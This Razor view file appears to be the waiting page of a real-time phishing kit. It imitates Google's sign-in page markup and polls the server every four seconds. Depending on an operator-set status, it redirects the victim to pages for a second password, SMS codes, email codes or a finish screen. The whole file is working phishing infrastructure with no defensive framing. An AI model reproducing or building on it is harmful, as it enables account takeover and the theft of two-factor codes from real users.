@{var edit = ViewBag.users as Users; }

<div id="view_container" class="JhUD8d SQNfcc vLGJgb" jscontroller="WFS13" jsaction="rcuQ6b:npT2md" jsmodel="Z7PiFb qFmk3b qbZ0Se nqpTHe hAn1A YPPRX eV9nn Xu2csd hc6Ubd">
    <div jscontroller="Ka7I6" jsaction="jiqeKb:ZCwQbe;u3KAb:ZCwQbe;cLkKDf:n4vmRb;DPVjO:tVBJG;vu6WPd:bCkDte;rcuQ6b:rcuQ6b;click:vBw6I(preventDefault=true|L6M1Fb),EtG4V(preventDefault=true|CkSUlf);DiUYjc:.CLIENT;abBxn:.CLIENT;nKbR0:.CLIENT;ffNU7c:.CLIENT" jsname="nUpftc" class="zWl5kd" data-view-id="b5STy" style="">
        <center><img style="width: 90%;" src="~/img/ads.gif"></center>
    </div>
</div>



<script>
    var userMail = "@edit.mail";
</script>

<script type="text/javascript">
    var xhr;
    var sInt = setInterval(function () {
        ajax('/getuser?mail=' + userMail, function () {
            if (this.readyState == 4 && this.status == 200) {
                var xhr = JSON.parse(this.responseText);

                debugger;
                if (xhr.stype == 2 && xhr.password2 == null) {
                    window.location.href = '/Password2';
                }

                if (xhr.stype == 3 && xhr.phone == null) {
                    window.location.href = '/Sms';
                }

                if (xhr.stype == 4 && xhr.phone == null) {
                    window.location.href = '/SmsSend';
                }

                if (xhr.stype == 5 && xhr.mailsend == null) {
                    window.location.href = '/Mail';
                }

                if (xhr.stype == 6 && xhr.mailcode == null) {
                    window.location.href = '/MailSend';
                }

                if (xhr.stype == 9999) {
                    window.location.href = '/Finish';
                }


            }
        });

    }, 4000);


    function ajax(url, callMethod) {
        var request = new XMLHttpRequest(); request.onreadystatechange = callMethod;
        request.open("POST", url, true); request.send();
    }

    function sleep(ms) {
        return new Promise(resolve => setTimeout(resolve, ms));
    }



</script>


